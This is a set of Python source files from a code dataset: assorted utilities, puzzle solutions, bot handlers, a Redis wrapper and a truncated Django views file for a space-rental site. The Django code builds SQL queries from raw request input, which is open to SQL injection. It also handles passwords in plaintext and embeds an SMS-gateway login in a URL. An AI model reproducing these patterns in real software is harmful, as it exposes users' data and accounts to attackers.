0)))\n\n        data = self._es.search(\n            index=self._index,\n            body=body,\n        )\n\n        if data['timed_out'] is True:\n            raise KibanaError(\"The query timed out!\")\n\n        rows = [entry['_source'] for entry in data['hits']['hits']]\n\n        self._logger.info(\"{:d} rows returned in {:d} ms\".format(len(rows), data['took']))\n        return rows\n\n    def get_rows(self, match, limit=10):\n        \"\"\"\n        Returns raw rows that match the given query\n\n        :arg match: query to be run against Kibana log messages (ex. {\"@message\": \"Foo Bar DB queries\"})\n        :arg limit: the number of results (defaults to 10)\n        \"\"\"\n        body = {\n            \"query\": {\n                \"match\": match,\n            }\n        }\n\n        return self._search(body, limit)\n\n    def query_by_string(self, query, limit=10):\n        \"\"\"\n        Returns raw rows that match the given query string\n\n        :arg query: query string to be run against Kibana log messages (ex. @message:\"^PHP Fatal\").\n        :arg limit: the number of results (defaults to 10)\n        \"\"\"\n        body = {\n            \"query\": {\n                \"query_string\": {\n                    \"query\": query,\n                }\n            }\n        }\n\n        return self._search(body, limit)\n\n    def get_to_timestamp(self):\n        \"\"\" Return the upper time boundary to returned data \"\"\"\n        return self._to\n","sub_path":"wikia/common/kibana/kibana.py","file_name":"kibana.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"232091353","text":"\"\"\" perfect tree \"\"\"\n\nfrom binary_tree import Btree, print_with_levels\n\n# Traverse the tree with BFS (level order), build a dictionary with the number of nodes\n# per level (npl), and then compute the total number of perfectly filled nodes\ndef max_perfect_size(node):\n    # BFS traverse and fill the npl dictionary\n    npl = {} # nodes per level\n    queue = [(node, 0)]\n    while len(queue) > 0:\n        next_node, level = queue.pop(0)\n        if level not in npl:\n            # Stop traversing the tree if a level is not fully filled\n            if level > 0 and npl[level-1] != 2 ** (level-1):\n                break\n            npl[level] = 1\n        else:\n            npl[level] += 1\n        if next_node.left:\n            queue.append((next_node.left, level + 1))\n        if next_node.right:\n            queue.append((next_node.right, level + 1))\n\n    # Find number of nodes based on the npl dictionary\n    return sum(node_nr for level, node_nr in npl.items()\n               if 2 ** level == node_nr)\n\n# Recursively traverse the tree and compute the value for every node\ndef solution(T):\n    def recursive(node):\n        if node is None:\n            return\n        else:\n            node_max_perfect = max_perfect_size(node)\n            if node_max_perfect > largest[0]:\n                largest[0] = node_max_perfect\n            recursive(node.left)\n            recursive(node.right)\n    \n    # Using \"largest\" variable as a one element array to keep the same\n    # reference after assigning a new max inside the recursive method\n    largest = [0]\n    recursive(T)\n    return largest[0]\n\n\n
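# --- Editor's aside (worked example, not original): for a perfect subtree of height 3 the BFS\n# yields npl = {0: 1, 1: 2, 2: 4}; every level satisfies node_nr == 2**level, so the sum is\n# 1 + 2 + 4 = 7. If level 2 held only 3 nodes, levels 0 and 1 alone would count, giving 3.\n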
if __name__ == '__main__':\n    t = Btree()\n    t.add(1)\n    assert solution(t.root) == 1\n    t.add(2)\n    assert solution(t.root) == 1\n\n    lst = list(range(1,16))\n    t = Btree.from_ordered_list(lst)\n    assert solution(t.root) == 15\n    t.delete(15)\n    assert solution(t.root) == 7\n    t.delete(14)\n    assert solution(t.root) == 7\n    t.delete(1)\n    assert solution(t.root) == 7\n    t.delete(2)\n    t.delete(3)\n    assert solution(t.root) == 3\n\n    print(\"Tests passed!\")","sub_path":"binary_tree/perfect_tree.py","file_name":"perfect_tree.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"150127201","text":"#! /usr/bin/env python\nimport sys\nimport xml.etree.ElementTree as et\n\nizq = 'izqNodo'\nder = 'derNodo'\nlists = et.parse(sys.argv[1]).getroot()[0].findall('facade.tree')\nfile = open((sys.argv[1]).split('.')[0]+'.txt','w')\nfor tree in lists:\n\tsons = tree.iter()\n\tfacade = next(sons)  # Python 3: iterators use next(), not .next()\n\tif len(list(facade)):  # getchildren() is deprecated; list(elem) yields the children\n\t\tders = []\n\t\tcadena = '('\n\t\tcerrar = 1\n\t\tfor son in sons:\n\t\t\ttag = son.tag\n\t\t\tif tag == izq:\n\t\t\t\tcadena+='('\n\t\t\t\tfor i in range(len(ders)):\n\t\t\t\t\tders[i]+=1\n\t\t\t\tcerrar+=1\n\t\t\telif tag == der:\n\t\t\t\tif len(ders):\n\t\t\t\t\tult = ders.pop()\n\t\t\t\t\tcadena += ')'*ult\n\t\t\t\t\tfor i in range(len(ders)):\n\t\t\t\t\t\tders[i]-=ult\n\t\t\t\t\tcerrar-=ult\n\t\t\t\tcadena+=')('\n\t\t\tif len(son.findall(der)):\n\t\t\t\tders+=[0]\n\t\tcadena+=')'*cerrar\n\t\tfile.write(cadena+'\\n')\n\telse:\n\t\tfile.write('-\\n')\n\nfile.close()\n","sub_path":"treesToParentheses.py","file_name":"treesToParentheses.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"69184178","text":"import socket\n\ntarget_host = '127.0.0.1'  # IP address of the server\ntarget_port = 9999\n\n# create a socket object\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# connect to the server\nclient.connect((target_host, target_port))\n\nwhile True:\n    # send some data\n    sendmsg = input(\"Enter a message: \")\n    if sendmsg == 'over':\n        print(\"Game over!\")\n        break\n    client.send(sendmsg.encode(\"utf-8\"))\n    response = client.recv(2048)\n    print(response.decode(\"utf-8\"))\nclient.close()\n","sub_path":"廖Py教程/py/18.网络编程/tcp_client.py","file_name":"tcp_client.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
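# --- Editor's aside: tcp_client.py above expects a server listening on 127.0.0.1:9999; a minimal,\n# hypothetical counterpart (not part of the dataset):\n#   import socket\n#   srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n#   srv.bind(('127.0.0.1', 9999))\n#   srv.listen(1)\n#   conn, addr = srv.accept()\n#   while True:\n#       data = conn.recv(2048)\n#       if not data:\n#           break\n#       conn.send(data)  # echo back; the client just prints whatever it receives\n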
{"seq_id":"194261291","text":"import logging\r\n\r\nfrom aiogram import types\r\nfrom aiogram.types import ReplyKeyboardMarkup, KeyboardButton, ContentType\r\n\r\nfrom server import dp\r\nfrom state import get_state\r\n\r\nlog_i = logging.info\r\nlog_w = logging.warning\r\n\r\n\r\n# handlers renamed for clarity; originally all three shared the name text_valid\r\n@dp.message_handler(content_types=ContentType.PHOTO)\r\nasync def photo_handler(message: types.Message):\r\n    state = get_state(message.from_user.id)\r\n    log_i(\"photo received\")\r\n    state.set_photo(message.photo[-1].file_id)\r\n    if len(state.get_photo()) > 3:\r\n        await message.answer(\"Use the /present_task command to present your task\")\r\n\r\n@dp.message_handler(content_types=ContentType.TEXT)\r\nasync def text_handler(message: types.Message):\r\n    state = get_state(message.from_user.id)\r\n    log_i(f\"{state.__class__} ---{state.state}\")\r\n    if \"text\" == state.state:\r\n        state.set_text(message.text)\r\n        markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)\r\n        markup.add(KeyboardButton(\"Send my location 🗺️\", request_location=True))\r\n        markup.add(\"Enter manually\")\r\n        await message.reply(\"Enter the geolocation\", reply_markup=markup)\r\n    elif message.text == \"Enter manually\":\r\n        pass\r\n    elif state.state == \"geo\":\r\n        state.set_geo_link(message.text, 'text')\r\n        await message.answer(\"Upload photos. 3 at most\")\r\n    # else:\r\n    #     await message.answer(\"Task registration failed; use /new_task to reset the task\")\r\n\r\n\r\n@dp.message_handler(content_types=ContentType.LOCATION)\r\nasync def location_handler(message: types.Message):\r\n    state = get_state(message.from_user.id)\r\n    if state.state == 'geo':  # was `state == 'geo'`, which compared the state object to a string\r\n        state.set_geo_link(message.location, \"cord\")  # trailing comma removed; it built a 1-tuple\r\n        await message.answer(\"Upload photos. 3 at most\\n When you are done, use the /present_task command\")\r\n","sub_path":"bot/free_bot_telegramm/handler/common_type.py","file_name":"common_type.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"620363609","text":"from __future__ import absolute_import\nimport functools\n\nfrom tornado import gen\n\nfrom appnado import exceptions\n\n\n# This decorator must be before @gen.coroutine\ndef handle_exceptions(func=None):\n    def the_decorator(func):\n        @gen.coroutine\n        @functools.wraps(func)\n        def wrapper(self, *args, **kwargs):\n            try:\n                yield func(self, *args, **kwargs)\n            except exceptions.AppnadoException as ex:\n                self.logger.error(ex)\n                self.build_response(ex)\n            except Exception as ex:  # pylint: disable=broad-except\n                self.logger.error(ex)\n                self.build_response(ex)\n\n        return wrapper\n\n    if func:\n        return the_decorator(func)\n    else:\n        return the_decorator\n","sub_path":"appnado/applications/http/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
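# --- Editor's aside: handle_exceptions above accepts being applied as @handle_exceptions or\n# @handle_exceptions(); a generic, self-contained sketch of that optional-argument pattern:\n#   import functools\n#   def optional_args_decorator(func=None):\n#       def the_decorator(f):\n#           @functools.wraps(f)\n#           def wrapper(*args, **kwargs):\n#               return f(*args, **kwargs)\n#           return wrapper\n#       return the_decorator(func) if func else the_decorator\n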
{"seq_id":"506355942","text":"import pandas as pd\r\nimport random\r\nimport math\r\n\r\n\r\nclass Team:\r\n    # Class for the Team object\r\n    \r\n    def __init__(self, id, name):\r\n        self.id = id\r\n        self.name = name\r\n        self.defeated_teams = []\r\n\r\n    def __str__(self):\r\n        return self.name\r\n\r\n    def __repr__(self):\r\n        return self.name\r\n\r\n\r\n# The following lines are optional, as the files have been provided.\r\n# Read the raw csv file for teams and only pull the first two columns (id, team_name).\r\nbracket_df = pd.read_csv('bracket-00.csv')\r\nbracket_df = bracket_df[['team_id', 'team_name']]\r\n# Grab only the first 64 rows - we need the number of teams to be a power of 2.\r\nbracket_df = bracket_df.loc[:63]\r\nbracket_df.to_csv('teams.csv', header=False, index=False)\r\n\r\n\r\ndef create_teams(file):\r\n    # Read from the teams.csv file and populate the teams list with Team objects.\r\n    with open(file) as f:\r\n        for line in f:\r\n            split_line = line.strip().split(',')  # strip the trailing newline so team names stay clean\r\n            teams.append(Team(split_line[0], split_line[1]))\r\n    return teams\r\n\r\ndef generate_bracket(teams):\r\n    # Generate a bracket from the teams list. The bracket list will be a list\r\n    # of randomly generated tuples of Team objects, such as\r\n    # bracket = [(Weber State, Gonzaga), (Baylor, Nebraska)]\r\n\r\n    # Number of 'games' to be played: with 64 teams there are going to be\r\n    # teams/2 games, in this example 32 games.\r\n    iterations = len(teams) // 2\r\n    bracket = []\r\n\r\n    for i in range(iterations):\r\n        team_1 = random.choice(teams)\r\n        teams.remove(team_1)\r\n        team_2 = random.choice(teams)\r\n        teams.remove(team_2)\r\n\r\n        bracket.append((team_1, team_2))\r\n    return bracket\r\n\r\ndef play_tournament(bracket, teams):\r\n    # Function to play out the tournament given an initial bracket list.\r\n    \r\n    # num_rounds equals log base 2 of the current number of teams, i.e.\r\n    # the number of \"levels\" in a binary tree.\r\n    num_rounds = int(math.log(len(teams), 2))\r\n    #print(num_rounds)\r\n\r\n    for i in range(num_rounds):\r\n        if len(winners) > 0:\r\n            # If the winners list is currently populated, i.e. past the first round\r\n            bracket = generate_bracket(winners)\r\n        else:\r\n            # Generate the bracket if no games have been played yet.\r\n            bracket = generate_bracket(teams)\r\n\r\n        for match in bracket:\r\n            # Iterate through the matches in the bracket list. Each match is a\r\n            # tuple of Team objects, i.e. (Gonzaga, Wichita State)\r\n\r\n            # Generate True/False at random. If False, the first team in the\r\n            # tuple wins; otherwise the second team wins.\r\n            selection = random.random() >= 0.5\r\n            # Keep track of the winner and loser\r\n            if not selection:\r\n                winner = match[0]\r\n                loser = match[1]\r\n            else:\r\n                winner = match[1]\r\n                loser = match[0]\r\n            \r\n            # The loser gets appended to the winning Team object's defeated_teams list\r\n            winner.defeated_teams.append(loser)\r\n            winners.append(winner)\r\n\r\ndef is_bracket_complete(teams, winners):\r\n    # Function to check whether the bracket has finished playing out.\r\n    \r\n    # If the teams list is exhausted and there is a single winner in the winners list,\r\n    # then the bracket is complete.\r\n    return ('Bracket is complete!' if (len(teams) == 0 and len(winners) == 1) \r\n        else 'Bracket is incomplete!')\r\n\r\n
def find_champion(teams, winners):\r\n    # Function to return the winner of the tournament\r\n\r\n    return (f'Your champion is { winners[0] }' if len(teams) == 0 and \r\n        len(winners) == 1 else 'No champion yet! Play out the tournament!')\r\n\r\ndef champions_path_to_victory(winners):\r\n    # Function that returns the champion's defeated-teams list in an f-string\r\n\r\n    if len(winners) > 0:\r\n        champion = winners[0]\r\n    else:\r\n        return('No champion!')\r\n\r\n    champion_defeated_teams = [team.name for team in champion.defeated_teams]\r\n    return (f'Your champion ({champion})\\'s path of destruction is ' + \r\n        '-> '.join(champion_defeated_teams))\r\n\r\n    \r\n# Initial lists that we need.\r\nteams = []\r\nbracket = []\r\nwinners = []\r\nteams = create_teams('teams.csv')\r\nplay_tournament(bracket, teams)\r\n\r\n#print(len(winners))\r\n#print(len(teams))\r\n#print(winners[0].defeated_teams)\r\n#print('Winner is ' + str(winners[-1]))\r\n#print(f'Winner {winners[-1]} defeated ' + str(winners[-1].defeated_teams) + \r\n#    ' on their road to the championship!')\r\n\r\nprint(is_bracket_complete(teams, winners))\r\ntest_winners = []\r\nprint(is_bracket_complete(teams, test_winners))\r\ntest_teams = [Team(1, 'TEST SCHOOL')]\r\nprint(is_bracket_complete(test_teams, winners))\r\nprint(find_champion(teams, winners))\r\nprint(champions_path_to_victory(winners))\r\nprint(champions_path_to_victory(test_winners))","sub_path":"4 - March Madness/bracket.py","file_name":"bracket.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"249553345","text":"import random as r\n\nnum = r.randint(1,100)\nguessed = False\nguess = input(\"Guess my number (1-100):\")\n\nwhile not guessed:\n    numberChosen = int(guess)\n    if(numberChosen == num):\n        guessed = True\n    else:\n        if (numberChosen > num):\n            print(\"Lower\")\n        else:\n            print(\"Higher\")\n        guess = input(\"Next guess:\")\n\nprint(\"you guessed correctly!\")\n","sub_path":"numberguesser.py","file_name":"numberguesser.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"34512283","text":"import logging\nimport sys\n\n# region Logging\ndef get_logger():\n    logger = logging.getLogger('artemis')\n    log_handler = logging.StreamHandler(stream=sys.stdout)\n    formatter = logging.Formatter('[%(asctime)s - %(levelname)-8s - %(module)-20s:%(lineno)4s - %(funcName)-45s] - %(message)s')\n    formatter.default_msec_format = '%s.%03d'\n    log_handler.setFormatter(formatter)\n    if not logger.handlers:\n        logger.addHandler(log_handler)\n    logger.setLevel(logging.DEBUG)\n    logger.propagate = False\n    return logger\n# endregion\n","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
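# --- Editor's aside: hypothetical usage of get_logger above (import path assumed from sub_path):\n#   from utils.common import get_logger\n#   log = get_logger()\n#   log.info('starting')  # emits a line shaped like [<time> - INFO     - <module>: <line> - <func>] - starting\n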
{"seq_id":"27954786","text":"import redis\r\n\r\n# Redis Keys\r\n\r\n# hash objects\r\nOVERALL_CAPACITY = 'capacity'\r\nVOLUME_STATUS = 'status'\r\nVOLUME_USAGE = 'usage'\r\nVOLUME_PREFIX = 'volume:'\r\nSNAPSHOT_PREFIX = 'snapshot:'\r\nBRICK_PREFIX = 'brick:'\r\nVOLUME_NFS = 'nfs'\r\nVOLUME_SAMBA = 'samba'\r\nVOLUME_ISCSI = 'iscsi'\r\nVOLUME_SWIFT = 'swift'\r\n\r\n# set objects\r\nVOLUME_NAMES = 'volume:names'\r\nNETWORKIO_IN = 'network_io_in:names'\r\nNETWORKIO_OUT = 'network_io_out:names'\r\n\r\n\r\n# single objects\r\nCLUSTER_DISKS = 'cluster:disks'\r\nCLUSTER_LIST = 'cluster:list'\r\nCLUSTER_RESOURCE = 'cluster:resource'\r\n\r\n# list objects\r\nMEMORY_USAGE_PREFIX = 'memory_usage:' # memory_usage:192.168.1.150\r\nCPU_USAGE_PREFIX = 'cpu_usage:' # cpu_usage:192.168.1.150:1 cpu_usage:192.168.1.150:2 etc\r\nREAD_SPEED_PREFIX = 'read_speed:'\r\nWRITE_SPEED_PREFIX = 'write_speed:'\r\nDISKWRITE = 'diskio_write:'\r\nDISKREAD = 'diskio_read:'\r\nDISKWRITEALL = 'disk_writes:'\r\nDISKREADALL = 'disk_reads:'\r\nDISK_NAME_WRITE = 'disk_name_write:'\r\nDISK_NAME_READ = 'diskname_read:'\r\nNETWORKIO_NAME_IN_INIT = 'network_machine_in_init:'\r\nNETWORKIO_NAME_OUT_INIT = 'network_machine_out_init:'\r\nNETWORKIO_IN_SUM_INIT = 'networkio_in_sum_init:'\r\nNETWORKIO_OUT_SUM_INIT = 'networkio_out_sum_init:'\r\n\r\n\r\n# Redis Values\r\nVOLUME_STATUS_STARTED = 'Started'\r\nVOLUME_STATUS_STOPPED = 'Stopped'\r\nVOLUME_CAPACITY = 'capacity'\r\nTIMESTAMP = \"timestamp\"\r\nTEST = \"test\"\r\nDATA = \"data\"\r\nTIME = \"time\"\r\n\r\n\r\n# This class is a thin wrapper around a redis instance.\r\n# NOTE: argument order follows redis-py 2.x StrictRedis; redis-py 3.x changed lrem to lrem(name, count, value).\r\nclass Redis:\r\n    r = redis.StrictRedis(host='localhost', port=6379, db=0)\r\n\r\n    @staticmethod\r\n    def set(name, value):\r\n        Redis.r.set(name, value)\r\n\r\n    @staticmethod\r\n    def psetex(name, time, value):\r\n        Redis.r.psetex(name, time, value)\r\n\r\n    @staticmethod\r\n    def setex(name, time, value):\r\n        Redis.r.setex(name, time, value)\r\n\r\n    @staticmethod\r\n    def pttl(name):\r\n        return Redis.r.pttl(name)  # was missing the return, so callers always got None\r\n\r\n    @staticmethod\r\n    def ttl(name):\r\n        return Redis.r.ttl(name)  # was missing the return, so callers always got None\r\n\r\n    @staticmethod\r\n    def get(name):\r\n        return Redis.r.get(name)\r\n\r\n    @staticmethod\r\n    def delete(name):\r\n        Redis.r.delete(name)\r\n\r\n    @staticmethod\r\n    def hset(name, key, value):\r\n        Redis.r.hset(name, key, value)\r\n\r\n    @staticmethod\r\n    def hmset(name, mapping):\r\n        Redis.r.hmset(name, mapping)\r\n\r\n    @staticmethod\r\n    def hget(name, key):\r\n        return Redis.r.hget(name, key)\r\n\r\n    @staticmethod\r\n    def hgetall(name):\r\n        return Redis.r.hgetall(name)\r\n\r\n    @staticmethod\r\n    def sadd(name, value):\r\n        Redis.r.sadd(name, value)\r\n\r\n    @staticmethod\r\n    def sget(name):\r\n        return Redis.r.smembers(name)\r\n\r\n    @staticmethod\r\n    def srem(name, key):\r\n        return Redis.r.srem(name, key)\r\n\r\n    @staticmethod\r\n    def lrem(name, value, num):\r\n        Redis.r.lrem(name, value, num)\r\n\r\n    # NOTE: despite the name, this appends to the tail of the list (RPUSH)\r\n    @staticmethod\r\n    def lpush(name, key):\r\n        Redis.r.rpush(name, key)\r\n\r\n    @staticmethod\r\n    def lrange(name, start, end):\r\n        return Redis.r.lrange(name, start, end)\r\n\r\n\r\n    @staticmethod\r\n    def lpop(name):\r\n        return Redis.r.lpop(name)\r\n","sub_path":"src/lib/glfs-web/app/redis_util.py","file_name":"redis_util.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
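# --- Editor's aside: hypothetical usage of the Redis wrapper above (needs a local redis-server\n# and redis-py 2.x for hmset):\n#   Redis.hmset(VOLUME_PREFIX + 'vol0', {VOLUME_CAPACITY: '10G', VOLUME_USAGE: '1G'})\n#   Redis.sadd(VOLUME_NAMES, 'vol0')\n#   print(Redis.hgetall(VOLUME_PREFIX + 'vol0'))\n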
{"seq_id":"316617087","text":"import random\r\nfrom datetime import date\r\nfrom http.client import HTTPResponse\r\n\r\nfrom django.http import *\r\nfrom django.shortcuts import *\r\nfrom math import *\r\n\r\nfrom django.views.decorators.csrf import *\r\nfrom django.core.files.storage import *\r\nfrom pymysql import *\r\nimport http.client\r\n\r\n# NOTE: the queries in this file build SQL by string concatenation, which is open to SQL\r\n# injection; see the parameterized-query aside after removecategory() below.\r\n\r\ndef random_with_N_digits(n):\r\n    range_start=10**(n-1)\r\n    range_end=(10**n)-1\r\n    from random import randint\r\n    return randint(range_start,range_end)\r\n\r\ndef addadmin(request):\r\n    return render(request,\"addadmin.html\")\r\n\r\n\r\n@csrf_exempt\r\ndef add(request):\r\n    conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n    q=\"select * from admin where email='\"+request.POST[\"email\"]+\"'\"\r\n    cr=conn.cursor()\r\n    cr.execute(q)\r\n    result=cr.fetchone()\r\n    if result:\r\n        # d={\"message\":\"Email already exists\"}\r\n        return HttpResponse(\"fail\")\r\n    else:\r\n        s = \"insert into admin values('\"+request.POST[\"email\"]+\"','\"+request.POST[\"password\"]+\"','\"+request.POST[\"type\"]+\"',\"+request.POST[\"mobile\"]+\")\"\r\n        cr = conn.cursor()\r\n        cr.execute(s)\r\n        conn.commit()\r\n        # d={\"message\":\"Admin added successfully\"}\r\n        return HttpResponse(\"success\")\r\n\r\ndef viewadmin(request):\r\n    if \"adminemail\" in request.session:\r\n        conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n        s=\"select * from admin\"\r\n        cr=conn.cursor()\r\n        cr.execute(s)\r\n        result=cr.fetchall()\r\n        x=[]\r\n        q=\"select type from admin where email='\"+request.session[\"adminemail\"]+\"'\"\r\n        cr.execute(q)\r\n        result1=cr.fetchone()\r\n        for row in result:\r\n            d={\"email\":row[0],\"password\":row[1],\"type\":row[2],\"mobile\":row[3]}\r\n            x.append(d)\r\n        return render(request,\"viewadmin.html\",{\"ar\":x,'type':result1[0]})\r\n    else:\r\n        return HttpResponseRedirect(\"adminlogin\")\r\n\r\n\r\ndef editadmin(request):\r\n    if \"adminemail\" in request.session:\r\n        conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n        s=\"select * from admin where email='\"+request.GET[\"q\"]+\"'\"\r\n        cr=conn.cursor()\r\n        cr.execute(s)\r\n        result=cr.fetchone()\r\n        #return HttpResponse(result)\r\n        d={\"email\":result[0],\"type\":result[2],\"mobile\":result[3]}\r\n        #return render(request,\"editadmin.html\",{\"ar\":d})\r\n        print(d)\r\n        return JsonResponse(d,safe=False)\r\n    else:\r\n        return HttpResponseRedirect(\"adminlogin\")\r\n\r\n@csrf_exempt\r\ndef saveadmin(request):\r\n    # print(request.POST[\"type\"])\r\n    # print(request.POST[\"email\"])\r\n    # print(request.POST[\"mobile\"])\r\n    if \"adminemail\" in request.session:\r\n        conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n        s = \"update admin set type='\" + request.POST[\"type\"] + \"',mobile='\" + request.POST[\r\n            \"mobile\"] + \"' where email='\"+request.POST[\"email\"]+\"'\"\r\n        cr = conn.cursor()\r\n        cr.execute(s)\r\n        conn.commit()\r\n        return HttpResponse(\"success\")\r\n    else:\r\n        return HttpResponseRedirect(\"adminlogin\")\r\n\r\n\r\ndef removeadmin(request):\r\n    conn=Connection(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n    s=\"delete from admin where email='\"+request.GET[\"q\"]+\"'\"\r\n    cr=conn.cursor()\r\n    cr.execute(s)\r\n    conn.commit()\r\n    return HttpResponseRedirect(\"viewadmin\")\r\n\r\n@csrf_exempt\r\ndef adminlogin(request):\r\n    return render(request,\"adminlogin.html\")\r\n\r\n@csrf_exempt\r\ndef checkadminlogin(request):\r\n    # print(request.POST['email'],request.POST['password'])\r\n    conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n    s=\"select * from admin where email='\"+request.POST[\"email\"]+\"'and password='\"+request.POST[\"password\"]+\"'\"\r\n    cr=conn.cursor()\r\n    cr.execute(s)\r\n    result=cr.fetchone()\r\n    if result:\r\n        request.session['adminemail'] = request.POST[\"email\"]\r\n        # return render(request, \"admindashboard.html\")\r\n        return HttpResponse(\"success\")\r\n    else:\r\n        # d = {\"message\": \"Invalid email/password\"}\r\n        # return render(request,\"adminlogin.html\" ,{\"ar\": d})\r\n        return HttpResponse(\"fail\")\r\n\r\ndef admindashboard(request):\r\n    if \"adminemail\" in request.session:\r\n        return render(request,\"admindashboard.html\")\r\n    else:\r\n        return HttpResponseRedirect(\"adminlogin\")\r\n\r\ndef logout(request):\r\n    try:\r\n        del request.session['adminemail']\r\n    except:\r\n        pass\r\n    return HttpResponseRedirect('adminlogin')\r\n\r\n# @csrf_exempt\r\n# def changepassword(request):\r\n#     if \"adminemail\" in request.session:\r\n#         return render(request,\"changepassword.html\")\r\n#     else:\r\n#         return render(request,\"adminlogin.html\")\r\n\r\n@csrf_exempt\r\ndef adminchangepassword(request):\r\n    if \"adminemail\" in request.session:\r\n        oldpassword=request.POST[\"oldpassword\"]\r\n        newpassword=request.POST[\"newpassword\"]\r\n        confirmpassword=request.POST[\"confirmpassword\"]\r\n        
conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n q=\"select * from admin where email='\"+request.session[\"adminemail\"]+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n result=cr.fetchone()\r\n if result[1]==oldpassword:\r\n s=\"update admin set password='\"+newpassword+\"' where email='\"+request.session[\"adminemail\"]+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n # d={\"message\":\"Password changed Successfully\"}\r\n return HttpResponse(\"success\")\r\n else:\r\n # d={\"message\":\"Old Password Incorrect\"}\r\n return HttpResponse(\"failed due to wrong old password\")\r\n else:\r\n return HttpResponseRedirect(\"adminlogin\")\r\n\r\n\r\n\r\n@csrf_exempt\r\ndef usersignup(request):\r\n return render(request,\"usersignup.html\")\r\n\r\n\r\ndef openusersignup2(request):\r\n mobile=request.GET['mobile']\r\n return render (request,'usersignup2.html',{\"mobile\":mobile})\r\n\r\n@csrf_exempt\r\ndef usersignup2(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"select * from user where email='\"+request.POST[\"email\"]+\"' and mobile=\"+request.POST[\"mobile\"]+\"\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchone()\r\n if result:\r\n return HttpResponse(\"fail\")\r\n else:\r\n file = request.FILES[\"photo\"]\r\n uploadname = \"userphotos/\" + str(random.randint(1, 100000)) + file.name\r\n\r\n s=\"insert into user values('\"+request.POST[\"mobile\"]+\"','\"+request.POST[\"email\"]+\"','\"+request.POST[\"password\"]+\"','\"+request.POST[\"name\"]+\"','\"+request.POST[\"address\"]+\"','\"+uploadname+\"')\"\r\n fs = FileSystemStorage()\r\n fs.save(uploadname, file)\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n # d={\"message\":\"User Added Successfully\"}\r\n return HttpResponse(\"success\")\r\n\r\ndef sendotp(request):\r\n mobile=request.GET['mobile']\r\n print('test',mobile)\r\n n=random_with_N_digits(6)\r\n request.session['userotp']=str(n)\r\n msg=\"your otp is \"+str(n)\r\n msg=msg.replace(\" \",\"%20\")\r\n conn=http.client.HTTPConnection(\"server1.vmm.education\")\r\n conn.request('GET','/VMMCloudMessaging/AWS_SMS_Sender?username=ayushidhir&password=6TLLQSSZ&message='+msg+'&phone_numbers='+str(mobile))\r\n response=conn.getresponse()\r\n print(response)\r\n return HttpResponse(\"success\")\r\n\r\ndef verifyotp(request):\r\n actualotp=request.session['userotp']\r\n otp=request.GET['otp']\r\n if actualotp==otp:\r\n return HttpResponse(\"success\")\r\n else:\r\n return HttpResponse(\"fail\")\r\n\r\n\r\n@csrf_exempt\r\ndef userlogin(request):\r\n return render(request,\"userlogin.html\")\r\n\r\n@csrf_exempt\r\ndef userlogin1(request):\r\n # print(request.POST['email'],request.POST['password'])\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from user where email='\" + request.POST[\"email\"] + \"'and password='\" + request.POST[\"password\"] + \"'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchone()\r\n # print(list(result))\r\n if result:\r\n # d = {\"name\": result[3]}\r\n request.session['useremail'] = request.POST[\"email\"]\r\n # return render(request, \"userdashboard.html\",{\"ar\":d})\r\n return HttpResponse(\"success\")\r\n\r\n else:\r\n # d = {\"message\": \"Invalid email/password\"}\r\n # return render(request, \"userlogin.html\",{\"ar\": d})\r\n return HttpResponse(\"fail\")\r\n\r\n\r\ndef userdashboard(request):\r\n return render(request,'userdashboard.html')\r\n\r\n@csrf_exempt\r\ndef forgot(request):\r\n 
